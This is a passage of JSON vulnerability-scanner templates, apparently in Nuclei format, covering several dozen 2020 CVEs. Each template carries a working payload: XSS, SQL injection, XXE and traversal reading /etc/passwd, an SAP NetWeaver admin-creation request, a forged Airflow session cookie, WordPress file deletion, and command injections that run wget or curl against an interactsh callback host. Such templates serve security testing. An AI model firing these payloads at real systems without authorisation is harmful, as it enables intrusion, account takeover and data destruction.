Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9483","info":{"name":"SkyWalking SQLI","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/graphql"],"body":"{\"query\":\"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\\\"all_p99\\\",id:\\\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \\\",}, duration: $d){values{value}}}\",\"variables\":{\"d\":{\"start\":\"2021-11-11\",\"end\":\"2021-11-12\",\"step\":\"DAY\"}}}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["UNION SELECT 1,CONCAT('~','9999999999','~')--","Exception while fetching data"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-28185","info":{"name":"TerraMaster TOS < 4.2.06 - User Enumeration","severity":"medium"},"requests":[{"raw":["GET /tos/index.php?user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /wizard/initialise.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/tos/index.php?user/login\n\ntab=checkuser&username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"status\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body_2","regex":["\"username\":\"(.*?)\"","\"email\":\"(.*?)\""]}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) />","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-6950","info":{"name":"Eclipse Mojarra - Local File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"<web-app\", \"<servlet>\") || contains_all(body, \"<faces-config\", \"</faces-config>\")"],"condition":"and"}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL 